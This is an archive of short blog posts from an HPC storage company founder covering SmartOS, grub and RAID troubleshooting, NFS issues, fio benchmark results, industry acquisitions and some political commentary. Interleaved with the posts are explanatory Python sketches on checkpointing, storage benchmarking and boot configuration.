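Here is a minimal Python sketch of saving state at critical points. Each named stage’s output is checkpointed to a JSON file, completed stages are skipped on restart, and transient failures get a few retries. The stage structure, file format, and retry policy are illustrative assumptions, not any particular workflow engine’s API.

```python
import json
import os
import tempfile
from typing import Callable

# A stage is a (name, function) pair; each function takes the data dict
# produced so far and returns the updated dict.
Stage = tuple[str, Callable[[dict], dict]]


def save_checkpoint(state: dict, path: str) -> None:
    """Atomically write state: temp file in the same dir, then rename."""
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".")
    with os.fdopen(fd, "w") as f:
        json.dump(state, f)
    os.replace(tmp, path)


def run_pipeline(stages: list[Stage], state_path: str, retries: int = 2) -> dict:
    """Run stages in order, checkpointing after each completed stage.

    Stages recorded as done in an existing checkpoint are skipped, so a
    restart after a crash resumes at the first unfinished stage. Each
    stage gets `retries` extra attempts before its error is re-raised.
    """
    state = {"done": [], "data": {}}
    if os.path.exists(state_path):
        with open(state_path) as f:
            state = json.load(f)

    for name, fn in stages:
        if name in state["done"]:
            continue  # finished in an earlier run
        for attempt in range(retries + 1):
            try:
                # Shallow copy: a failed attempt leaves no top-level changes.
                state["data"] = fn(dict(state["data"]))
                break
            except Exception:
                if attempt == retries:
                    raise
        state["done"].append(name)
        save_checkpoint(state, state_path)
    return state["data"]
```

The write-then-rename in `save_checkpoint` matters. A crash during a checkpoint write should not destroy the last good one.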
Posts
Two "new" projects
Hyperspace and 26. One does something wholly unholy, and the other takes our significant advantage in a particular area and makes it … well … even more of an advantage. Hyperspace may be with us at HPC on Wall Street. Working on it with our partner in … er … alternative dimensions. Yeah. That’s the ticket! Assuming everything works out, you will hear about 26 before SC12, and probably see a few there.
Posts
SmartOS now booting from Tiburon
Ok … took a little bit of hacking on Tiburon to add a capability I had long wanted to add. And it’s not completely doing things the SmartOS way … but it works for the moment.
[ ](/images/SmartOS-booted-from-Tiburon.png)
Have some additional testing to do, drivers to test, yadda yadda yadda. But the message should be clear. We can boot SmartOS from Tiburon (Scalable Informatics siCluster Storage and Computing cluster infrastructure).
Posts
A code to measure IOPs/Bandwidth
Many testing codes for storage systems report various values, by shoving IO down the pipe, and measuring amount shoved, and interval between the first IO call and “end” of last IO call. This is all well and good for some cases, but caching and many other effects get in the way of accurate measurement. Systems eventually settle down to an approximate state with small perturbations around this state. The problem is that most tools don’t quite report this.
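One way to report the settled state is to sample rates over fixed intervals, discard a warm-up period, and report the mean and spread of what remains. This avoids relying on a single first-call-to-last-call average. Below is a Python sketch; the warm-up length, window size, and sample values are all made up for illustration.

```python
import statistics


def steady_state(samples: list[float], warmup: int, window: int) -> tuple[float, float]:
    """Mean and standard deviation of the settled part of a rate series.

    `samples` are rates measured over fixed intervals (e.g. MB/s per
    second). The first `warmup` intervals, where caches fill or drain,
    are dropped; the last `window` of the remaining intervals describe
    the approximate steady state and the size of perturbations around it.
    """
    if window < 2:
        raise ValueError("window must hold at least 2 samples")
    settled = samples[warmup:]
    if len(settled) < window:
        raise ValueError("not enough samples after warm-up")
    tail = settled[-window:]
    return statistics.fmean(tail), statistics.stdev(tail)


# Made-up per-second read rates: a cache-assisted start, then settling.
rates = [2400, 2100, 1500, 1210, 1190, 1205, 1195, 1200]
mean, sd = steady_state(rates, warmup=3, window=5)
print(f"whole-run average {statistics.fmean(rates):.0f} MB/s")  # 1500
print(f"steady state {mean:.0f} +/- {sd:.1f} MB/s")            # 1200 +/- 7.9
```

In this made-up trace, the whole-run average overstates the settled rate by 25%, and the cache-assisted start is entirely responsible.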
Posts
I see benchmarketing back in full swing
I’ve read quite a few storage press releases talking about how “product X is capable of performance Y and IOPs Z.” I also notice that they didn’t say “we measured this, this way, and this is what we found.” I wonder why. I look at it this way, if we reported numbers the way lots of these folks report numbers, our JackRabbit JR5 machine would have a bandwidth of 6.2GB/s read and 5GB/s write.
Posts
Rereading posts from 6 years ago ...
NFS sucked then as well. We’ve got a customer who occasionally pushes their hardware a wee bit too hard, and stuff comes crashing down. It looks like a kernel bug, one I’ve not been able to identify for a number of reasons, and I can’t find a mechanism to reliably tickle it. This is the definition of a Heisenbug. Basically the problem is this. They use NFS, extensively. NFS is great for low level IO rates.
Posts
started playing with SmartOS for the day job
This is a very cool concept, something that meshes perfectly with our Tiburon based siCluster philosophy. That is, compute nodes should boot diskless, there should be very little state on each node, and stuff that you need to do should be made absolutely as simple as possible. SmartOS is a project of Joyent. Joyent, for those not familiar with them, are a cloud company, building a nice public cloud for end users to build on.
Posts
Dear DEA ...
According to this you don’t have enough high performance storage for your analyses.
First off, no, it’s not expensive. You are just using the wrong vendors. Second off … please … PLEASE … call us. We’d be happy to hook you up with Petabytes for the price you are likely paying for Terabytes. Seriously. Our units are inexpensive enough that you could buy them, replicate the data across them, and then store them.
Posts
one of the curious features of our history
This is about learning, not from mistakes, but from a … well … empirical approach to “partnerships”. When I started up the company 10 years ago, we weren’t on anyone’s radar. Self funded, running out of my basement. Yeah, real big threat there. I noticed something though. During our time operating, first as an LLC, then as an Inc., we attracted a range of … er … partners and others. Many of them would come to try to, for lack of a more accurate way to phrase this, pry ideas, plans, and IP/designs out of us.
Posts
grub drive enumeration
So there you are, helping a customer out with a problem. They’ve just added in a replacement OS disk using your process. At the end of the process is a bit of … well … an insurance procedure: make sure grub is correctly installed on each drive in the RAID1. The `grub.conf` file has `root (hd0,0)`, `kernel .... root=/dev/md0 ...`, and `initrd ...`. Makes sense, right? ’Cause hd0 enumerates to the first BIOS drive used for booting in the boot list.
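For context, here is a commonly used grub legacy insurance step on RAID1. This is an assumption, since the post’s own process isn’t shown. The step maps each member disk to `(hd0)` in turn and runs `setup`, so whichever disk the BIOS presents first can boot. The Python sketch below generates that command sequence; the device names are hypothetical.

```python
def grub_setup_script(members: list[str], boot_partition: int = 0) -> str:
    """Build grub-legacy shell commands that install grub on every disk.

    Each RAID1 member is temporarily mapped to (hd0) before `setup`, so
    the boot code on every disk refers to "the first BIOS disk". If one
    disk dies, the survivor is normally what the BIOS presents first.
    """
    lines: list[str] = []
    for disk in members:
        lines += [
            f"device (hd0) {disk}",          # treat this disk as hd0
            f"root (hd0,{boot_partition})",  # partition holding /boot
            "setup (hd0)",                   # install boot code on it
        ]
    lines.append("quit")
    return "\n".join(lines) + "\n"


# Hypothetical member disks of the OS RAID1.
print(grub_setup_script(["/dev/sda", "/dev/sdb"]), end="")
```

The output is meant to be fed to the grub legacy shell in batch mode. Check it against your distribution’s grub legacy documentation before relying on it.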
Posts
What does "forever" really mean for a company? And its implications for clouds ... and business models ...
Note, in advance: this is not a slam on the company I will mention. I actually agree with their migration concept, even if I disagree with the details. In the early days of their life, Joyent made a lifetime offer for goods and services. These were pretty reasonable offerings, and the hook of
How long is it good for? As long as we exist. As in … forever. But what does “forever” actually mean?
Posts
More M&A: IBM snarfs up Texas Memory Systems
We knew that TMS was looking for a buyer. And IBM is a very intelligently run company; they see how the technologies are changing. IBM has grabbed TMS. This alters a bunch of playing fields. There is a shrinking pool of available players out there: Virident, STEC, and a few others. OCZ is occasionally rumored to be talking to Seagate and others. With TMS, IBM can now offer integrated TMS metadata servers for GPFS.
Posts
More M&A: TCS grabs CRL
TCS is arguably one of the more successful services groups out there. Cloud computing naturally fits into this, as cloud is AAS (As A Service). CRL has a localized bit of expertise in Pune, as well as customers pretty widely spread out. We’ve worked with them in the past, they have some of our gear. Dr. Vipin Chaudhary, CEO of CRL is a good friend and business partner going back a ways.
Posts
Day job will be at HPC on Wall Street conference in NYC 19-Sept
Still deciding what to bring … at least one thing new (we have a number). Will have at least one partner in the booth, possibly more. Will be right by the coffee !!!! I can hook an IV straight from there … Very excited! More info soon.
Posts
As a service: the rapidly changing face of HPC
Our market is often inundated with buzzwords. And fads sweep through organizations looking for silver bullets to their very hard problems. Some of these problems are self-inflicted … some are as a result of growth, or needed infrastructure change. One of the biggest problems with HPC (and to a degree, storage) has been the high up-front costs to build what you need. You have to lay down capital to buy something, which may or may not have an ROI adequate to pay for it.
Posts
OT: Welcome to the newest member of our family
Captain is a rescue dog from the CHAINED Inc. organization. He is the dog on the right at 1:21. His sister is the dog on the left of that frame.
[ ](/images/captain.jpg)
Captain is a yellow lab, 9 months old or so. He was badly abused. He has major trust issues, and I don’t blame him for this. It will take time for him to learn to trust. He’s been with us 5 days now, and loves my wife and daughter.
Posts
Whats old is new again
Inspired by this article. Back in the dim and distant past, when I started graduate school … no, before that … I had something of a … naive … world and economic view. This view had me believing that newly minted physics Ph.D. types would be able to find a nice tenure-track position relatively easily after a short postdoc. From there to professional career bliss. Do research, write grants, publish, teach.
Posts
Cool hack attempt ...
This one was actually much harder to recognize as a hack attempt until I looked at the payload in an editor. Never EVER, under any circumstances, read HTML mail from a source you don’t trust … and I am getting ready to say, from anyone. Here is a portion of the payload: `
Posts
So much #fail in the RHEL init process
It’s borked so incredibly badly that, in order to support what we need, we have to hack around all its brokenness. Dracut is a step up, but pretty much everything else (and this may be a dracut issue) is borked. We want one initramfs to support software RAID1 boot, network boot, and iSCSI boot. But you have to pull in so many modules to get this to work … we end up with gigantic initramfs images that take forever to assemble.
Posts
We built that: 10 years in business
[warning: longer post] I mentioned this on twitter (@sijoe). The day job has been in business for 10 years. We’ve not taken outside investment to date, and we’ve not sold the company yet. We’ve been profitable and growing continuously during our lifetime. The preceding 3 years have seen growth, accelerating hard. The company was built starting with a conviction that practitioners and users of HPC systems needed better designs, better systems than were being pushed out by traditional vendors in the early 2000’s.
Posts
... and Oracle snarfs up Xsigo ...
Xsigo makes virtual network connectivity systems, basically letting you build a virtual network in a software stack, so you can avoid spending so much money on a fixed (and inflexible) network stack. It’s a neat concept, but its utility is focused elsewhere than HPC. Even though they talk storage, I’d argue it’s a fairly expensive way to build a network for storage as well … though if you are going to be changing your network all the time, it actually might be a win.
Posts
... and he's back!
with a good article on a new license formulated for genomic code being distributed by a university research center. Glad to see the blog back up! Or rebooted … and +10 on your article. It (that license) is the wrong direction IMO. Goes against what publicly funded scientific code should be distributed as (IMO).
Posts
More M&A?
I’ve heard OCZ is being looked at by Seagate and others. That would make sense. Honestly, my expectation is not that companies will be having fire sales … but that companies in areas where some sort of force multiplication is possible will be snapped up to help grow larger companies. Acquirers are after a few things: value in terms of market, products, people, technology and capability, fit, etc. I do expect to see a few fire sales, but not many.
Posts
A question a customer asked relative to Lustre and the Whamcloud acquisition
What’s to become of Chroma (from Whamcloud)? I know it’s early, and I am sure that there won’t be answers just yet. Intel acquired Cilk, and it’s now available (and being integrated into gcc!). Intel acquired many others, and their bits are available. I’d expect Chroma to be made into an offering from Intel, along the lines of their cluster suite: a fully integrated stack. I know some folks are nervous about the acquisition.
Posts
Some kernels don't like having non-assemble-able software RAIDs
This one took me a while to figure out. I had to start probing why a system would crash the MD stack shortly after booting, but not in single user mode. So I started delving into the RAID. And found that the folks who set this unit up had a RAID0 with 0.90 metadata on the devices, and then 1.2 metadata on the MDS. So along comes the Lustre-ized kernel, and whammo.
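Mixed metadata is confusing partly because the md metadata versions store their superblocks in different places. Their locations do not overlap, so a stale superblock of one version can survive alongside a live one of another unless something explicitly clears it. The Python sketch below computes the offsets as described in the mdadm documentation: 0.90 near the end of the device, 1.1 at the start, and 1.2 at 4K from the start. The 1 TiB device size is hypothetical.

```python
KIB = 1024


def superblock_offset(device_bytes: int, version: str) -> int:
    """Byte offset of the md superblock for a given metadata version.

    0.90: a 4K superblock in the last 64K-aligned 64K block of the device.
    1.1:  at the very start of the device.
    1.2:  4K from the start of the device.
    (1.0, which also sits near the end, is left out of this sketch.)
    """
    if version == "0.90":
        aligned = device_bytes & ~(64 * KIB - 1)  # round down to 64K
        if aligned < 64 * KIB:
            raise ValueError("device too small for 0.90 metadata")
        return aligned - 64 * KIB
    if version == "1.1":
        return 0
    if version == "1.2":
        return 4 * KIB
    raise ValueError(f"unsupported metadata version {version!r}")


disk = 1 << 40  # hypothetical 1 TiB member device
for v in ("0.90", "1.2"):
    print(v, superblock_offset(disk, v))
```

Running `mdadm --examine` against the member devices is the usual way to see which superblocks are actually present before trusting an assembly.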
Posts
ahh grub 0.97 + ext4 ... how I loathe thee
I had forgotten that some combinations of grub + file system could be rendered unbootable without lots of additional help. Grub is annoying. This is Grub legacy. Grub current tries to fix the mess, but fails as it is overly complex. And it appears to omit PXE and network boot options. Well, iPXE helps us there. This is why we like tiburon so much. No installation. No problem. No grub to worry about.
Posts
bad design + bad implementation = company success ??? Seriously ???
We are often hired to work on existing systems, to see if we can help make them faster and better. I am working on such a project now, but this post is not about this project. I’ve noticed a tendency in the market to shoehorn a set of designs for storage/computing systems into areas they weren’t designed for. Moreover, these designs would have been right at home 15 years ago; since then, far better scale-out designs have come along that do a far better job than the older ones.
Posts
hits bottom, digs deeper
[update] below the fold and video. I can only conclude at this point that the “don’t get it” disease runs deep and wide in this administration. [update 2] This at the WSJ encapsulates what we are observing. This has gone beyond painful to watch to embarrassing. The president now claims that his statements were sliced and diced. He now is saying that he believes that businesses built themselves, while claiming that his earlier statement was taken out of context.
Posts
Putting 2 and 2 together, hopefully getting 4
I’ve been long bothered by serious people espousing ideas not well correlated with reality, as representing reality, and telling us not to believe our lying eyes or instruments. This is in a context of (catastrophic) AGW (call this CAGW). I don’t have any dogs in that race, nor in fracking, which uses hydrological mechanisms to extract hydrocarbon fuel precursors from underground reservoirs. I am very interested in sound science, and sound policy derived from either sound science, or as close to intelligently constructed policy as we can make.
Posts
Insanely funny comedic response to "you didn't build that"
This past week saw the president of the US in another major screw up … one he doesn’t quite understand is a screw up … and many of his supporters don’t quite seem to get it either. The responses to the screw up have been coming fast and furious. This has become a major issue of the campaign now, about “getting it”. It’s as defining as “it’s the economy, stupid”, and specifically as to what the economy is.
Posts
Economic headwinds being reported
HPC is a small fraction of the total computing market. The market in general experiences forces from the state of the economy … in growing economic times, large portions of the computing market are generally refreshing and updating gear. Conversely, when we are treading water, or contracting as an economy, word from on high in IT organizations is usually “make do with what you have” for a while. Many industries and economists have noted signs portending a downturn over the past few months.
Posts
SSaaS ... huh... what?
On James Cuff’s blog, a nice post about utilization of software. In it he writes:
to which I say …
Seriously … I gave up on indentation as a form of program structure when I stopped doing much Fortran. Sheesh. What’s next … everyone using BASIC, with a little OO wrapper, a JIT, and an LLVM backend to run on GPUs (with a VHDL conversion tool)?
Posts
Seriously enjoying playing with the Julia language
See here. Parallel and distributed computing, not as an afterthought, but reasonably well integrated. Even better would be loops and vector ops which handled parallelism completely transparently … which … they effectively do in some cases. We’re still waiting on static compilers; the language uses an LLVM backend. There’s even a hook to generate code for PTX targets. No more separate language needed for GPUs. Just run your code and it takes advantage of computational resources, regardless of their asymmetric nature.
Posts
Gaak ... this is why we like tiburon
Finishing up building and testing a Ceph system for a customer. Unfortunately, due to another technical issue, we couldn’t simply encode the config in tiburon finishing scripts. The technical issue is that another project is using the current tiburon master system, and we don’t have a spare system to build a mirror of it (going to change this soon), so we are stuck using an older, more rudimentary version of the system.
Posts
GlusterFS and RDMA support
[update] In 3.3.1/3.3.2 This appeared in the 3.3.0 docs. “NOTE: with 3.3.0 release, transport type ‘rdma’ and ‘tcp,rdma’ are not fully supported.” On page 133 of the Admin Guide. We’ve been noting breakage with support since the 3.0.x days. I think there were varying factions within the company that wanted pure tcp, and some wanted RDMA included. The latter is what HPC folks use for their storage. GlusterFS is going in a decidedly non-HPC direction, which is fine.
Posts
9 years and 351 days
[updated to get the count right] That’s how long the day job has been in business. Our 10 year anniversary is 1-August. I started this business 10 years ago, in part to scratch an itch, but really because I believed strongly in the HPC market. I still do, though our view of the market has evolved, and we look on how it’s been evolving with mixtures of joy and trepidation. Trepidation in part because we’ve been pretty good at predicting what comes next, and sadly not been able to raise the capital needed to build in that area (at least previously).
Posts
Why business models for HPC are so very important
You need a sound business model. Not a sound business plan, but a concept of where revenue comes in, and how you will profit from it, and what your costs are, before you should build and sell a product. In the case of state sponsored infrastructure, any model that looks like this:
1. Build it
2. ???
3. Profit!

… is a failure waiting to happen. It’s not a business model.
Posts
huge dependency radii, or why I stopped using Catalyst
More than a year ago, we were working on (re)developing some code for UI for our units. Original UI code had been in Catalyst framework, an MVC system for Perl. I like Perl, it makes rapid application development easy, and reasonably painless. CPAN makes avoiding coding things yourself pretty easy. Short side trip. A dependency radius is the measure of the number of additional things unrelated to your source code itself, required to build or operate your program.
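One reasonable reading of the definition above takes “radius” to mean the size of the transitive dependency closure. Under that reading, it can be counted with a breadth-first walk over the dependency graph, as in the Python sketch below. The package graph is hypothetical.

```python
from collections import deque


def dependency_radius(graph: dict[str, list[str]], root: str) -> int:
    """Count distinct packages needed, directly or transitively, by `root`.

    `graph` maps each package to its direct dependencies; the root
    itself is not counted, and shared dependencies are counted once.
    """
    seen = {root}
    queue = deque([root])
    while queue:
        pkg = queue.popleft()
        for dep in graph.get(pkg, []):
            if dep not in seen:
                seen.add(dep)
                queue.append(dep)
    return len(seen) - 1


# Hypothetical graph: two direct dependencies fan out to five packages.
deps = {
    "my-ui": ["web-framework", "json-lib"],
    "web-framework": ["template-engine", "json-lib", "http-server"],
    "http-server": ["event-loop"],
}
print(dependency_radius(deps, "my-ui"))  # 5
```

The gap between the direct list (two entries) and the closure (five) is exactly what bites when a framework pulls in half of CPAN.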
Posts
... and Whamcloud is snarfed up by Intel ...
See here
First off, congratulations to Brent, Eric, and everyone at Whamcloud. I had thought that the BI/Big Data side of things could prove interesting for them, and might make them in play. I hadn’t realized how quickly this was the case. Second, Big Data is huge. Lustre, which is effectively Whamcloud’s product (ignoring IP ownership, yadda yadda …), can play there, though it needs some serious additional work. But with the acquisition, I’d argue that the multithreading MDS and ODS are not far off.
Posts
OT: Just brilliant
I’ve been a Thunderbird email client user since 2004. I dropped Evolution in favor of Thunderbird; it just worked, everywhere, the same. Around the 2009-2010 time period, Mozilla decided to refocus Thunderbird and pull resources from it. This didn’t work out well, as users protested rather intensely. Looks like they are about to do it again, specifically to start chasing the mobile market. This letter on pastebin … and the priceless commentary afterwards, yeah … says it all.
Posts
Just configured a new generation storage unit ...
4U, 256TB raw, fire-breathing, monstrously fast unit. Our existing 5U units already leave competitors’ single units, never mind their storage clusters, deep in the dust and falling rapidly behind. Next gen isn’t incremental change. It’s big. Huge even. Density and performance that boggles my mind, and we’ve set some pretty serious records for performance (5.6 GB/s read, 4.5 GB/s write for spinning disk) with the existing kit. And you will see these very soon.
Posts
Presenting the Higgs boson
Reuters has an article on it here. Not my area of work from a while ago, but I had a few friends (postdocs, etc.) working on it (in a theoretical sense). One quit high energy physics to work on the “muck left over after the big bang”. The latter is where the money and jobs are, the former is for those who get lucky and find an academic home. I find it funny how reporters tend to paint groups with broad strokes.
Posts
What to think about cloud outages
EC2 was taken down by the storms running across the US. Parts of EC2 were, anyway. And it took down Netflix and others. Hmmmm. We put our web and mail into EC2 specifically to avoid these sorts of problems. While we are working on getting our second line up on a different technology from our primary, we are leaving it in the cloud. As I’ve said many times … There ain’t no such thing as a silver bullet or a free lunch.
Posts
OT: my reading list ...
So I am off on a vacation tomorrow. Normally for our summer forays, I grab Gardner Dozois’s compendium called The Year’s Best Science Fiction. I have it from year 14 to the current one (year 28). It’s just not summer without it. Well, it’s not out yet. Will be out on 3-July. Oh well… Ok … I also grab everything by Charles Stross that I have not read from the preceding year. Hey, he’s got a new Laundry book coming out!
Posts
OT: Off to a nice "relaxing" vacation tomorrow
Long overdue. We’ve had a … challenging … year, starting with some family health issues, and my working from home for the first 6 weeks of the year. The company had to make an adjustment after we realized that there was a poor match of capabilities, motivation, and goals for a portion of our team. All this contributed to increasing my level of stress. So I am happy to report that we are hopping into a car (minivan really), and making the trek to Orlando, by way of Atlanta.
Posts
[updated] Lumps ...
[Update] Not all of the issues were with the supplier. I started investigating and found out that we deserved some of the lumps. Me in particular for not paying more attention to the situation as it evolved. I made the assumption that someone else was covering it, and I didn’t need to. As I’ve discovered, this was a mistake on my part. The story is more annoying than I allude to here.
Posts
(nearly) a Gigaflop at your side
First impression: this is so wrong … so … very wrong … Second impression: well, mebbe not.
Source: http://hothardware.com/Reviews/Samsung-Galaxy-S-III-Review/?page=5
Seriously though, this is a natural evolution of a public “flash” cloud. This is 1/5 of a gigaflop, which as a grad student 22+ years ago, I would have sacrificed for. I don’t think it will be too long before we are seeing multi-GFLOP on our hips. In which case, apart from network latency and storage bandwidth and size … you’ve got a seething mobile computing platform out there with a huge aggregate capability.
Posts
Security and legal implications of the data bandwidth wall
Again, hat tip to Alastair who pointed me at this article. At the most basic level, there are real costs, and real consequences, to not being able to act nimbly and use the bandwidth you need for the operations your job requires. These consequences could have some significant implications for legal cases. Or for terror threats. What if you have a trove of data that you have to act quickly upon?
Posts
Security and legal implications of the data bandwidth wall, part 0
Had a link sent in (hat tip to Alastair) with a story that perfectly illustrates the data bandwidth wall and its effect on our ability to act in a legal manner. There are broader implications, and … to us … something of a surprising connection to the company. And a serious indictment of the current US government procurement process. This story has EPIC FAILURE (for the US government) written all over it, for multiple reasons.
Posts
Bad decisions in retrospect
We’ve made one in particular that is causing me to (seriously) regret our choice. We use wiki software for our documentation and internal site(s). We had chosen dekiwiki as our platform, based upon our perceived need for ease of use, access control, and other issues. The first wiki went up fine. This was an internal wiki for knowledge capture. The second wiki came up fine, for documentation. I like living documentation we can annotate.
Posts
Is flash a flash in the pan?
This article makes a case that it is. As with many articles about X dying, it’s worth asking if their argument makes sense. Basically, the point they are making boils down to density, resiliency, and other aspects. Specifically, they point out that the fundamental flash design is inherently flawed … it self-destructs after a while … wears out. So their argument goes: the denser the bits per cell, the fewer write cycles before the cell is unusable.
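The endurance argument comes down to simple arithmetic. A device can absorb roughly capacity × rated P/E (program/erase) cycles of NAND writes, and each host write costs some multiple of that, the write amplification. Below is a minimal Python sketch assuming ideal wear leveling. The P/E ratings, the write amplification of 2, and the 500 GB/day workload are illustrative assumptions, not figures from the article.

```python
# Assumed, order-of-magnitude P/E ratings for illustration; real parts vary widely.
ASSUMED_PE_CYCLES = {"SLC": 100_000, "MLC": 3_000, "TLC": 1_000}


def lifetime_years(capacity_gb, pe_cycles, host_gb_per_day, write_amplification=2.0):
    """Years until the rated P/E budget is used up, assuming ideal wear leveling.

    Total NAND writes the device can absorb = capacity * P/E cycles.
    NAND writes per day = host writes per day * write amplification.
    """
    budget_gb = capacity_gb * pe_cycles
    nand_gb_per_day = host_gb_per_day * write_amplification
    return budget_gb / nand_gb_per_day / 365.0


if __name__ == "__main__":
    for cell, cycles in ASSUMED_PE_CYCLES.items():
        years = lifetime_years(256, cycles, host_gb_per_day=500)
        print(f"{cell}: {years:,.1f} years")
```

Holding capacity and workload fixed, lifetime scales linearly with the P/E rating. So a drop in cycles per cell from denser encodings shortens service life directly, unless capacity grows to compensate.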
Posts
OT: Wishing for more competition in cellular phones ...
Just spent 3+ hours dealing with Verizon over setting up a business account for the company, moving phones/mifi to this, and getting a new line. Discovering in the process that the company doesn’t quite grok business customers. Or its own products. Or what it’s sold. Sadly, Verizon’s network is the best. Sadly, they are … a royal pain … to deal with. Very long story, wish it weren’t as bad as it is here.
Posts
code angry: Application gateway via very powerful Perl code
I’ve been banging my head against fastcgi. At a fundamental level, fastcgi is meant to be a CGI gateway allowing multiple simultaneous processes to run at once, to serve pages. Ok. nginx (and Apache, and others) can use fastcgi to run PHP code. Well, Apache can run it “natively” while the others need to run it externally. Our website is PHP based (drupal). So are some of our tools. And ya know, the transition to nginx has not been smooth for them.
Posts
A lesson in economics
This is somewhat tangential (at least the initial part) to HPC and storage, but it has significant similarities … it’s worth paying attention to. Much text, noise, and argumentation have surrounded things like Obamacare here in the US. This is, whether or not the proponents like to admit it, a push for a socialized medical system, with “controlled” costs, and all manner of other things. Yeah, we’ll hear how the US has “crappy” medical coverage, or country X is so much better because everyone gets coverage.
Posts
Nginx rules ...
I was having lots … and I mean LOTS of trouble with apache 2.2 on the new web server. It simply refused to do vhosts no matter what I did. Debugging it was painful. I’d tried lighttpd in the past, and while I liked some aspects of it better than Apache, it still was hard to debug. So I figured I’d give nginx a try. It’s an up-and-comer in the web serving business, and seems to be one of the fastest growing on the net.
Posts
... and the VM (and its snapshot) managed to get corrupted ...
Talking about rt. Our support site. Thankfully most of the stuff is in the database with a little customization. Thankfully we want to move from 3.x to 4.x. Annoyingly, this is more work. Thankfully, our web server design is now far more intelligent than in the past. We may simply run it on the web frontend directly, rather than running it as a VM. There’s really little advantage to the VM, and we keep having to do a reset of the VM.
Posts
Why ... oh ... why ...
Dear Red Hat: You put out a good product in RHEL 6.x. Ignoring the (often massive) performance regressions, other things are better/more stable. Dracut is growing on me. Actually liking being able to debug startup. But, this said … I have to inquire … Why on earth did you include an End-Of-Lifed version of Perl (5.10.x) in RHEL 6.x? What … exactly … was the thought process behind this? Have a look here: and search for “Latest releases in each branch”.
Posts
Snort ... guffaw .... cackle ...
Enjoyed this read. Some of the take away snippets
Ok, there is a combination of humor, and a possible simple test to determine if you are one of them thar bad “right-wingers” (note: tongue firmly planted in cheek here). Just ask a) education level, and b) opinion of AGW. But even more than this … this study was driven by the soft science folks wondering about some attitudes and levels of scientific literacy and numeracy.
Posts
RIP Kyril Faenov
Kyril Faenov of Microsoft passed away several days ago. He was one of the visionaries and leaders behind Microsoft’s HPC effort. He was also a nice guy, one whom I had a chance to talk with several times over the last few years. One of the bright folks you like to challenge. I respected him and his efforts, even if I didn’t agree with them. More information here, and I found this originally at InsideHPC.
Posts
Stress analysis of a market ... does this explain Facebook's IPO issues?
c.f. this post at ZeroHedge.
In case you haven’t guessed it, ZeroHedge does not like HFT aka algorithmic trading. It’s an informative blog … sometimes bordering on alarmist … but for the most part, a good read.
Posts
Misalignment of performance expectations and reality
We are working on a project for a consulting customer. They’ve hired us to help them figure out where their performance is being “lost”. Obviously, without naming names or revealing information, I note something interesting about this, that I’ve alluded to many times before. There is an often profound mismatch between expectations for a system and what it actually achieves. This is in large part why we benchmark and test our systems in configurations as close to real as possible, and report real numbers, while many (most) of our competitors make WAGs at best case/best effort/best condition theoretical numbers.
Posts
siFlash tuning
We’ve been tuning our siFlash. Not done yet … not done, but look where we are. 24 simultaneous streaming (non-cached) reads.
Run status group 0 (all jobs):
READ: io=193632MB, aggrb=7781.4MB/s, minb=7781.4MB/s, maxb=7781.4MB/s, mint=24884msec, maxt=24884msec

Yeah. Baby. Added almost another GB/s to the read performance. Streaming write performance is hovering around 2.6GB/s. Remember, this is a half-configured system. Imagine what we could do with a fully configured system. Sustaining 147k random write IOPS (4k random writes, with 144 simultaneous threads), and 210k random read IOPS.
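fio’s summary line carries enough information to sanity-check itself. Aggregate bandwidth should be roughly io divided by the longest job runtime (maxt). Below is a minimal Python sketch that extracts those fields from the older fio run-status format shown above, recomputes the rate, and converts the quoted 4k IOPS numbers into implied bandwidth. The regex, the function names, and treating fio’s KB/MB/GB as powers of 1024 are all assumptions for illustration.

```python
import re

# Matches one fio "Run status group" summary line (older fio output format).
RUN_STATUS_RE = re.compile(
    r"(?P<op>READ|WRITE): io=(?P<io>[\d.]+)(?P<io_unit>[KMGT]B), "
    r"aggrb=(?P<aggrb>[\d.]+)(?P<aggrb_unit>[KMGT]B)/s.*?maxt=(?P<maxt>\d+)msec"
)

# Scale factors to MB, treating fio's units as powers of 1024 (an assumption).
TO_MB = {"KB": 1.0 / 1024, "MB": 1.0, "GB": 1024.0, "TB": 1024.0 ** 2}


def check_run_status(line):
    """Return (op, reported MB/s, MB/s recomputed as io / maxt)."""
    m = RUN_STATUS_RE.search(line)
    if m is None:
        raise ValueError("no fio run-status summary found")
    io_mb = float(m["io"]) * TO_MB[m["io_unit"]]
    reported = float(m["aggrb"]) * TO_MB[m["aggrb_unit"]]
    recomputed = io_mb / (int(m["maxt"]) / 1000.0)
    return m["op"], reported, recomputed


def iops_to_mb_s(iops, block_kb=4):
    """Bandwidth implied by a random-I/O rate at a fixed block size."""
    return iops * block_kb / 1024.0


line = ("READ: io=193632MB, aggrb=7781.4MB/s, minb=7781.4MB/s, "
        "maxb=7781.4MB/s, mint=24884msec, maxt=24884msec")

if __name__ == "__main__":
    print(check_run_status(line))
    print(iops_to_mb_s(147_000), iops_to_mb_s(210_000))
```

For the read run above, the recomputed figure matches the reported 7781.4MB/s to within rounding. 147k 4k random writes works out to about 574MB/s of small-block traffic.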
Posts
What high performance isn't
We’ve had a number of interesting interactions with customers over the last few weeks. They all seem to center on, and around, how to get high performance out of gear which isn’t designed for high performance. Generally speaking, you can’t. High performance requires a mixture of design and implementation, with well designed and implemented parts. High performance isn’t:
- A random collection of web and file servers joined together with clustering tools
- Some random tier 1 box usually used as a lower end file server shoved with disks/ssd/Flash
- A poorly architected, but easy to purchase system (e.
Posts
Thinking of using Warewulf as a base for some of our diskless work
I’ve been thinking about this for a while. We have a good diskless system, but I’ve always liked the nano-ramdisk version of the OS. Create a base distro with JEOS (just enough OS) to boot, and mount all the other bits you need. Not that there is anything wrong with what we are doing now, it’s just that I really like that capability. Especially if we could keep the ramdisk compressed.
Posts
An NFS gotcha
As we rebuild our server infrastructure (aside from taking time to do things more intelligently), we run into some bumps. This one sorta threw me for a bit.
[root@virtual ~]# mount -a
mount.nfs: Stale NFS file handle
mount.nfs: Stale NFS file handle

Checked all the usual suspects. No dice. The /etc/exports was correct, and visible locally. There was a DNS oddity I resolved (humor … heh). But mounts kept giving me the stale NFS handle.
Posts
When core assumptions that should never be wrong, do turn out to be wrong
So … where does this tale begin? We had a nice backup system in place at the lab. Twice a week, all the important servers would happily sync their contents to this unit over Gigabit ethernet. It worked well, we were happy. Place that snippet in the background, it will come up again. I’ve told our customers for a long time that RAID is not a backup. RAID is RAID, it gives you time to recover from a failure.
Posts
... and it can talk ...
[root@skunkworks-prototype-n2 ~]# ifinfo
device: address/netmask MTU Tx (MB) Rx (MB)
eth0: addr not set/mask not set 1500 0.000 0.000
